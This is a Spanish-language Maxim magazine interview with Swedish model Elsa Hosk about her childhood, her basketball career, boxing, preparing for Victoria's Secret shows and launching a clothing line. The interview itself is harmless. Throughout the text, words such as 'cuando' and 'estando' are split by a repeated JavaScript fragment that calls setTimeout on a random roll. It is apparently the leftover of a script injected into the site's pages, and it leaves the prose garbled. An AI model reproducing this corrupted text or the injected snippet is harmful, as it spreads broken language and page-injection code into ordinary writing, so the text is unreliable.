Elsa Hosk: Vegas baby

    Elsa Hosk: Vegas baby

    La sirena sueca habla sobre lo que se necesita para ser un ángel.

    Autor: Redacción Maxim 16 octubre, 2019



    Fotografía por Sante D’Orazio, Styling por Isabel Dupré.

    Entrevista y fotos de la modelo sueca Elsa Hosk

    El entrenamiento atlético de Elsa Hosk, una exjugadora profesional de basquetbol en Suecia, se hace evidente cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando está frente a la cámara: la intensa profundidad de su mirada, la forma dominante en la que su cuerpo se desempeña, la magia trascendente de estar ahí en el momento. Hosk es cálida y exuberante, de espíritu libre y aventurero con alto nivel de destreza física y disciplina. Ella sabe lo que es estar noqueada y volverse a levantar, y las caídas sólo la han hecho más fuerte. Piensa como un guerrero y luce como un ángel nórdico. Ella es, indudablemente, una fuerza.

    Naciste en Suecia, ¿cómo fue crecer en un país donde la mayoría de los meses del año son obscuros?

    Creces de esa manera, no conoces nada distinto, así que me imagino que te acostumbras a ello como un niño. Es muy intenso ahora cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando regreso a Suecia después de vivir en Nueva York por más de siete años. Los inviernos son muy obscuros, tienes que ir al trabajo en medio de la obscuridad y regresar a casa en la obscuridad —se puede volver muy deprimente—. Pero por el otro lado, tenemos este hermoso verano donde la luz se queda todo el día y la noche. Los suecos viven para el verano —transforma a todos—. Yo no me quiero perder unas vacaciones en el verano sueco mientras viva. Es mi cosa favorita en el mundo.

    ¿Cuáles son tus mejores recuerdos de la infancia?

    Acabar con la escuela en el verano. Huir de los salones de clase y tener en mente que tienes tres meses de libertad por delante. Viajar en el viejo bote de la familia al archipiélago, y quedarse el resto del verano en esta pequeña isla llamada Utö. Persiguiendo a mi hermano mayor y oliendo los roles de canela recién horneados de mi madre. ¡Ahh…!

    Has dicho, dirigiéndote a las mujeres en Fair Girls, la organización que tú apoyas, que fuiste “lastimada” una vez. ¿Qué necesitaste para volverte valiente y entera?

    Todos pasamos por momentos difíciles en algún punto de nuestras vidas. Yo me puedo relacionar con estas chicas y con las preguntas que ellas mismas se hacen. Yo tuve la suerte de encontrar apoyo y tener buenas personas a mi alrededor, ayudándome a volverme más fuerte cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando me preguntaba a misma “¿Quién soy?”. Las mujeres tienen que lidiar con tanta inseguridad, miedo y presión. Lo importante es encontrar gente buena en nuestras vidas que nos ame por las razones correctas, recordandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando tener en cuenta nuestros propios defectos de carácter y trabajar en ellos para ser mejores, más fuertes y poderosos. El tiempo lo sana todo, un día a la vez.

    Jugaste como basquetbolista profesional por dos años, has hablado sobre cómo la intensidad de las prácticas diarias te preparó para tu carrera como modelo. ¿Puedes describir tu actitud antes de un juego?

    Estoy tan emocionada antes de un juego. Amo la adrenalina. Mi cerebro es competitivo. ¡Me llevó a un punto donde me siento como si fuera a explotar! Es tan divertido. Realmente no lo puedo explicar. Creo que siempre he sido así. Practicar deportes es grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andioso cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando eres joven. Te enseña a concentrarte, a cómo direccionar tu energía, a no pensar en otro millón de cosas que están sucediendo. En los últimos tres meses he estado aprendiendo a boxear. Si no estás cien por ciento en el momento, puedes quedarte bloqueado. No hay tiempo para divagar en tu cerebro pensandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando en “cosas”. Tienes que reaccionar por instinto.

    ¿Y tu estado de concentración cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando estás modelandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando en un show de Victoria’s Secret?

    Me preparo mentalmente para esto. Es un increíble día de locura. Trato de meditar un poco antes del show para que pueda estar ahí en el momento y disfrutandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando todo lo que está sucediendo. También me preparo físicamente. Empezandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando dos meses antes de la presentación, duplico mis ejercicios y pienso más sobre lo que como. Cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando sabes que millones de personas van a estar mirándote en lencería, tienes que estar lista a toda costa.

    ¿Te sientes cómoda estandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando desnuda?

    (Risas) Ésta es una pregunta graciosa, porque de hecho… ¡lo estoy! Tal vez es algo sueco. O sea, ¿no todos estamos cómodos desnudos, sin ropa jalándose, retorciéndose, colgándose sobre ti?

    ¿Cuándo aprendiste inglés? Lo hablas perfecto…

    En Suecia aprendemos inglés en la escuela. Pero también he viajado desde que tengo 13 años, me obligué a estar cómoda con el inglés. Ahora que he vivido en Nueva York por tanto tiempo, viene a mí más fácilmente que el sueco, ¡el cual odio absolutamente!

    ¿Cómo se dice sexy en sueco?

    Sexig.

    ¿Cuáles son las cualidades más seductoras que un hombre puede tener?

    Humor, amabilidad, seguridad y no ser prejuicioso.

    ¿Cuáles son tus aspiraciones para el futuro?

    Ser un ángel de Victoria’s Secret es increíble y me ha abierto muchas puertas. Quiero continuar sobre este camino. También estoy lanzandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando una línea de ropa llamada Lola Rebella con mi amiga, la diseñadora Johanna Dauphin. Tiene su inspiración en lo vintage y será lanzada este año. Estoy muy emocionada por esto.

    Ahora recordemos este DETRÁS DE CÁMARAS DEL VICTORIA’S SECRET SWIM SPECIAL.

    Temas relacionados con esta nota: , , , ,

La sirena sueca habla sobre lo que se necesita para ser un ángel.